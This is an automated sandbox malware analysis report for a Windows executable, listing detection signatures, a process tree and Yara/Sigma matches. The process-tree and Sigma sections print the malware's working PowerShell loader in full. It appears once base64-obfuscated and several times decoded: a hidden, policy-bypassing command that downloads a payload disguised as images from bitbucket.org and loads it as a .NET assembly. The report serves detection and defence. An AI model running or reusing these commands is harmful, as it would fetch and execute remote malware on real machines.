Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nTHivMbGpg.exe

Overview

General Information

Sample name:nTHivMbGpg.exe
renamed because original name is a hash value
Original sample name:e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337.exe
Analysis ID:1524410
MD5:8d797e4c1866e6542705a564b7fda527
SHA1:207db5ae1e14888dc1b2d552ba49d45b7cc3b48f
SHA256:e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337
Tags:104-21-81-233exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nTHivMbGpg.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\nTHivMbGpg.exe" MD5: 8D797E4C1866E6542705A564B7FDA527)
    • cmd.exe (PID: 7120 cmdline: cmd /c 124.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3724 cmdline: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 2412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • rundll32.exe (PID: 7244 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3724JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 3724INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x612b8:$b2: ::FromBase64String(
    • 0xb1aef:$b2: ::FromBase64String(
    • 0xb1900:$b3: ::UTF8.GetString(
    • 0x36c2a:$s1: -join
    • 0xbbecb:$s1: -join
    • 0x3531:$s3: reverse
    • 0xed6f:$s3: reverse
    • 0x84ccb:$s3: reverse
    • 0x8b79e:$s3: reverse
    • 0xd1dfd:$s3: reverse
    • 0xd8a52:$s3: reverse
    • 0xdaa39:$s3: reverse
    • 0xe5a68:$s3: reverse
    • 0x12c826:$s3: reverse
    • 0x12cb14:$s3: reverse
    • 0x12d22e:$s3: reverse
    • 0x12d9e7:$s3: reverse
    • 0x134ad2:$s3: reverse
    • 0x134eec:$s3: reverse
    • 0x135a74:$s3: reverse
    • 0x136721:$s3: reverse
    Process Memory Space: powershell.exe PID: 2412JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2412INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x358a9:$b2: ::FromBase64String(
      • 0xa3319:$b2: ::FromBase64String(
      • 0xe058a:$b2: ::FromBase64String(
      • 0xe772e:$b2: ::FromBase64String(
      • 0xe83d7:$b2: ::FromBase64String(
      • 0x1d573a:$b2: ::FromBase64String(
      • 0x1f5629:$b2: ::FromBase64String(
      • 0x28f36e:$b2: ::FromBase64String(
      • 0x2cf13d:$b2: ::FromBase64String(
      • 0x2d3e48:$b2: ::FromBase64String(
      • 0x356ba:$b3: ::UTF8.GetString(
      • 0xa312a:$b3: ::UTF8.GetString(
      • 0xe039b:$b3: ::UTF8.GetString(
      • 0xe753f:$b3: ::UTF8.GetString(
      • 0xe81e8:$b3: ::UTF8.GetString(
      • 0x1d554b:$b3: ::UTF8.GetString(
      • 0x1f543a:$b3: ::UTF8.GetString(
      • 0x28f17f:$b3: ::UTF8.GetString(
      • 0x2cef4e:$b3: ::UTF8.GetString(
      • 0x2d3c59:$b3: ::UTF8.GetString(
      • 0x4d8b8:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_2412.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Spreading

        barindex
        Sigma detected: Powershell download payload from hardcoded c2 list
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQ
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQ